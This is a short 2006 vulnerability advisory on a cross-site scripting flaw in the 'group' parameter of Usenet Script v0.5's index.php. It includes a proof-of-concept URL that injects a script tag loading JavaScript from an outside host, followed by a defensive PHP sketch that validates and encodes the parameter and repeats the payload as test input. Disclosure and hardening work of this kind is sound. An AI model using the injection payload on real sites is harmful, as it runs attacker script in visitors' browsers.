Securityvulns SECURITYVULNS:DOC:13334
Jun 27, 2006 - 12:00 a.m.

Usenet Script v0.5

Homepage:
http://www.metalhead.ws/usenet

Description:

"Those scripts allow you to mirror a Newsgroup in an SQL database. The development database was
Postgresql, but it uses dbx and should therefore be able to work with other database systems, too.
Furthermore, a frontend is provided."

Affected files:

index.php


XSS vulnerability via the group variable in index.php:

The data isn't properly sanitized before the output is generated.
http://www.example.com/index.php?group=<script src=http://www.youfucktard.com/xss.js></script>
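
A hardening sketch for the group parameter, added here as an example and not taken from Usenet Script's code: it validates the value against an allow-list for newsgroup names and HTML-encodes it on output. The function names, the heading markup and the sample inputs are assumptions, since the advisory does not show how index.php uses the value.

```php
<?php
// Added example: hypothetical helpers, not code from Usenet Script.

// Allow-list for newsgroup names: dot-separated components made of
// letters, digits, '+', '-' and '_' (for example "comp.lang.php").
function valid_group(string $group): bool
{
    return strlen($group) <= 255
        && preg_match('/\A[a-z0-9+_-]+(\.[a-z0-9+_-]+)*\z/i', $group) === 1;
}

// Encode a value for an HTML text or quoted-attribute context.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Returns the heading markup, or null when the request should be rejected.
// $raw is untyped on purpose: "?group[]=x" makes PHP hand over an array.
function render_group_heading($raw): ?string
{
    if (!is_string($raw) || !valid_group($raw)) {
        return null; // caller answers 400 instead of echoing the input
    }
    return '<h1>Group: ' . h($raw) . '</h1>';
}

// Constructed sample inputs; in index.php the value would be
// $_GET['group'] ?? null.
$samples = [
    'comp.lang.php',
    '<script src=http://attacker.example/xss.js></script>',
    ['array', 'input'],
];

foreach ($samples as $raw) {
    $html = render_group_heading($raw);
    echo ($html ?? 'rejected: 400 Bad Request'), PHP_EOL;
}

// Where a strict allow-list is not possible, encoding on output still
// keeps the payload from being parsed as markup.
echo h('<script src=http://attacker.example/xss.js></script>'), PHP_EOL;
```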